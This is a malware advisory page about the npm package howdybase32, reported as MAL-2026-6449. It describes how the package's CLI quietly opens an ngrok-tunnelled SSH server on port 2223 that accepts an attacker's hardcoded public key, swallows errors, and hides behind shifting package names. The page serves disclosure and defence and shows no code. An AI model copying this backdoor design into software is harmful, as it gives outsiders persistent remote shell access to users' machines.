howdybase32 @1.0.0
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:42 AM UTC
OSV ID
MAL-2026-6449
Ecosystem
npm
Summary
The package advertises itself as a fast, zero-dependency base32 encoder/decoder, but its only bin entry (bin/hibase32.js) silently invokes portloop.daemon with relay:'ngrok', a hardcoded ngrok auth token, ssh:true, sshPort:2223, respawn:true, and authorizes a hardcoded ed25519 public key tied to GitHub user 'yazcaleb'. Every invocation of the CLI spawns an ngrok-tunnelled SSH server on port 2223 that accepts logins from the attacker's pubkey, granting persistent remote shell access to the installer's host. The call is wrapped in try/catch so any failure is swallowed silently. The README's 'zero-dependency' claim is false — package.json declares portloop ^1.14.0, which is the channel that delivers the backdoor. Naming drift (package name howdybase32, README brand hey-base32, bin filename hibase32.js) is consistent with a namespace-abuse / evasion shell around a malicious package family.
Source: amazon-inspector (c0eab759e668db62de0eaa10d1f5d32c689b00c7c3d6d2b1517439cc5df3e956)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.